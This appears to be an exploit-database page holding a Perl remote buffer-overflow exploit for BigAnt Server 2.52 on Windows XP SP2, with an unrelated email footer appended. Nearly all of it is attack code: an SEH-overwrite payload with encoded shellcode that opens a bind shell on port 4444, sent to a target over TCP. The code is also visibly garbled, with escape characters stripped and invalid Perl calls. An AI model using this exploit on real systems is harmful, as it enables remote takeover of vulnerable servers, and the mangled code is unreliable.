Home / os / winme

ba252-overflow.txt

Posted on 15 January 2010

# Exploit Title: BigAnt Server v2.52 Remote BOF (Perl)
# Date: 2009-1-14
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 2.52
# Tested on: Windows XP SP2
# CVE : [if exists]
# Code :
#BigAnt Server v2.52 Remote BOF (Perl Edition )
#Discovered by Lincoln !!!
# Written and coded by Jacky!
# All Greetz to Peter Van Eeckhoutte and Corelan team!
# This time i wrote this exploit in perl because i haven't seen anyone wrote it in perl and share it .
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
use strict;
use Socket;
if(@ARGV ne 1)
{
print "Usage:$0 <ip address>
";
exit 0;
}
($host)=@ARGV;
my $buffer="A"x294;
my $nseh="xebx06x90x90";
my $seh="x95x32x9ax0f";
my $nops="x90"x20;
my $shellcode="x50x50x59x41x49x41x49x41x49x41x49x41x51x41x54".
"x41x58x41x5ax41x50x55x33x51x41x44x41x5ax41x42".
"x41x52x41x4cx41x59x41x49x41x51x41x49x41x51x41".
"x50x41x35x41x41x41x50x41x5ax31x41x49x31x41x49".
"x41x49x41x4ax31x31x41x49x41x49x41x58x41x35x38".
"x41x41x50x41x5ax41x42x41x42x51x49x31x41x49x51".
"x49x41x49x51x49x31x31x31x31x41x49x41x4ax51x49".
"x31x41x59x41x5ax42x41x42x41x42x41x42x41x42x33".
"x30x41x50x42x39x34x34x4ax42x45x39x49x51x49x4a".
"x49x49x48x59x44x31x4ax54x51x4dx42x35x42x39x50".
"x49x50x49x51x39x51x39x50x49x51x39x50x49x51x39".
"x51x39x51x39x51x33x50x43x50x43x50x43x50x43x50".
"x43x50x37x42x31x50x5ax42x4ax51x31x50x58x50x50".
"x50x30x51x31x50x30x51x31x42x4bx51x31x51x31x42".
"x31x50x32x51x31x51x32x50x32x51x32x51x32x50x30".
"x50x42x51x32x51x31x51x32x50x58x42x30x50x38x51".
"x31x51x32x42x55x50x4ax51x39x50x49x42x4cx50x4d".
"x50x38x50x4fx44x39x50x43x50x30x50x47x42x50x50".
"x45x50x50x51x35x50x30x50x4bx50x39x50x4ax50x45".
"x50x45x43x31x50x4ex50x32x50x43x42x34x50x4cx50".
"x4bx50x50x51x42x50x46x50x50x50x4ex42x4bx42x31".
"x50x42x50x44x50x4cx50x4cx50x4bx51x36x50x32x51".
"x37x43x34x50x4ex42x4bx50x51x43x32x50x47x42x38".
"x50x44x50x4fx50x4cx42x57x51x32x51x5ax51x35x43".
"x46x51x36x50x51x50x49x42x4fx50x46x42x31x50x4b".
"x42x50x50x4cx42x4cx50x45x42x4cx50x50x43x31x50".
"x51x42x4cx51x35x42x32x50x46x50x4cx51x35x42x50".
"x50x4ax43x31x50x4ax42x4fx51x34x50x4dx51x37x42".
"x51x50x4bx42x57x51x39x44x32x50x4cx50x30x50x46".
"x50x32x50x43x43x37x50x4ex42x4bx50x43x42x42x51".
"x34x50x50x50x4cx50x4bx50x50x50x42x50x47x50x4c".
"x50x46x51x51x50x4ex50x30x50x4ex42x4bx50x47x50".
"x30x50x42x51x48x50x4fx42x55x50x4bx42x50x51x34".
"x50x34x50x43x43x4ax51x37x44x31x50x48x50x50x51".
"x32x44x30x50x4cx50x4bx50x42x42x48x50x42x50x38".
"x50x4cx50x4bx42x31x51x38x51x37x42x30x51x37x42".
"x51x50x4ex50x33x50x4dx50x33x50x45x42x4cx51x32".
"x43x39x50x4ex42x4bx51x35x43x34x50x4cx50x4bx51".
"x37x42x51x50x49x51x36x42x30x50x31x51x39x42x4f".
"x50x44x42x51x50x4fx50x30x50x4cx42x4cx50x4bx42".
"x51x50x4ax42x4fx51x36x42x4dx50x43x50x31x50x4a".
"x42x47x51x35x43x38x50x4bx42x30x50x51x42x45x50".
"x48x43x44x51x33x50x33x50x43x50x4dx50x4ax42x38".
"x51x35x42x4bx50x43x50x4dx50x45x44x34x50x43x51".
"x35x50x48x51x52x51x32x42x58x50x4cx50x4bx50x42".
"x44x38x50x47x51x44x51x37x44x31x50x4bx43x33x50".
"x50x43x36x50x4ex42x4bx50x44x50x4cx50x42x42x4b".
"x50x4cx50x4bx51x33x42x48x51x35x50x4cx50x45x42".
"x31x51x38x50x53x50x4ex42x4bx51x36x51x54x50x4e".
"x42x4bx51x37x44x31x51x38x42x30x50x4dx42x39x50".
"x51x42x34x50x45x42x54x51x34x42x44x51x33x42x4b".
"x50x43x42x4bx51x35x50x31x51x32x44x39x51x33x51".
"x5ax50x50x50x51x50x4bx50x4fx50x4bx50x50x50x42".
"x43x48x51x33x42x4fx42x31x50x4ax50x4ex42x4bx50".
"x46x42x52x50x4ax50x4bx50x4fx42x56x50x51x50x4d".
"x51x35x50x38x50x50x50x33x51x36x51x42x50x43x50".
"x30x50x47x42x50x51x35x50x38x51x34x50x37x42x30".
"x43x43x50x44x42x52x51x33x42x4fx50x42x43x44x50".
"x51x42x58x42x30x50x4cx50x42x42x37x51x35x44x36".
"x50x47x42x57x50x4bx50x4fx50x4ex50x35x50x4fx50".
"x48x50x4cx50x50x50x45x50x51x50x47x44x30x50x45".
"x42x30x50x46x51x39x50x4fx50x34x50x46x50x34x51".
"x32x44x30x51x35x50x38x42x31x50x39x50x4bx50x30".
"x42x30x42x4bx51x33x50x30x50x4bx50x4fx50x49x51".
"x35x50x50x42x30x50x46x50x30x42x30x42x30x51x36".
"x50x30x50x51x42x30x51x36x50x30x42x31x42x30x50".
"x42x42x50x51x35x50x38x51x38x42x4ax50x46x42x4f".
"x50x49x50x4fx51x39x42x50x50x4bx50x4fx50x48x42".
"x35x50x4dx42x39x50x4bx44x37x51x36x42x31x50x4b".
"x42x4bx51x32x42x53x50x50x51x58x50x45x51x42x51".
"x35x42x30x51x36x42x51x50x43x42x4cx50x4fx42x59".
"x50x4ax51x36x50x50x51x5ax51x36x42x50x51x36x50".
"x36x51x32x43x47x50x51x42x58x51x39x50x52x51x39".
"x50x4bx51x37x51x37x50x50x42x47x51x39x42x4fx50".
"x4ex50x35x50x46x50x33x50x42x44x37x42x31x42x58".
"x50x4ex42x37x50x48x51x59x51x36x51x48x50x4bx50".
"x4fx50x4bx50x4fx50x48x50x55x50x43x51x53x51x33".
"x42x43x51x33x51x57x50x50x42x48x42x30x42x54x51".
"x38x42x4cx51x35x42x4bx50x4dx50x31x50x49x42x4f".
"x50x4bx42x45x51x33x43x37x50x4fx43x49x50x49x51".
"x47x50x42x50x48x42x31x51x55x51x32x50x4ex51x32".
"x42x4dx51x33x42x31x50x4bx50x4fx50x48x51x45x50".
"x42x51x38x50x43x42x33x51x32x50x4dx42x30x43x34".
"x51x37x42x50x50x4dx51x49x51x38x51x53x50x51x50".
"x47x42x31x51x37x51x36x50x37x50x44x44x31x50x4c".
"x50x36x50x51x42x5ax50x42x50x32x42x31x51x39x50".
"x46x50x36x50x4dx50x32x51x39x42x4dx42x30x51x56".
"x50x4ax42x47x50x47x50x34x50x45x44x34x51x35x42".
"x4cx50x46x43x31x50x46x51x51x50x4ex42x4dx50x50".
"x51x34x42x31x50x34x50x42x50x30x50x48x50x46x50".
"x47x42x50x50x47x50x34x50x51x51x34x50x50x50x50".
"x50x50x51x46x50x43x43x36x51x36x50x36x42x30x50".
"x46x51x33x51x56x42x30x50x4ex50x46x50x36x51x33".
"x51x56x50x42x44x33x50x50x50x56x51x32x50x48x50".
"x51x51x59x50x4ax42x4cx50x47x50x4fx50x4cx50x46".
"x50x4bx50x4fx51x38x51x45x50x4ex42x49x50x4dx50".
"x30x42x30x50x4ex50x50x50x56x50x43x43x46x50x4b".
"x50x4fx50x50x50x30x50x45x50x38x50x46x51x58x50".
"x4ex51x57x51x35x50x4dx51x35x50x30x50x4bx50x4f".
"x50x4bx43x35x50x4dx42x4bx50x4ax42x30x50x4fx50".
"x45x50x4cx43x32x42x31x50x46x50x42x50x48x50x4d".
"x43x46x50x4dx50x45x50x4fx50x4dx50x4fx42x4dx50".
"x4bx50x4fx51x38x50x55x50x47x50x4cx51x33x50x36".
"x50x51x42x4cx51x36x51x5ax50x4dx50x50x50x4bx50".
"x4bx50x4dx50x30x50x44x50x35x50x46x43x35x50x4f".
"x50x4bx50x42x42x47x50x46x43x43x42x30x43x42x50".
"x42x50x4fx50x43x50x5ax51x37x44x30x50x42x42x53".
"x50x49x42x4fx50x4bx51x55x50x45x51x4ax51x31x51".
"x31x41x41";            #Bind port 4444
my $rest="A"x1000;
my $payload=$buffer.$nseh.$seh.$nops.$shellcode.$rest;
my $port=Shift || 6660;
my $proto=getprotobyname('tcp');

socket(SERVER,PF_INET,SOCK_STREAM,$proto);
connect($host,$port) or die "[+]Cannot Connect!
";
print "[+]Connection Done!
";
print SERVER "USV".$payload."

";
print "[+]Evil Payload Sent!
";
print "[+]Done!
";
close SERVER;




________________________________
Keep your friends updated— even when you’re not signed in.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_5:092010>

 

TOP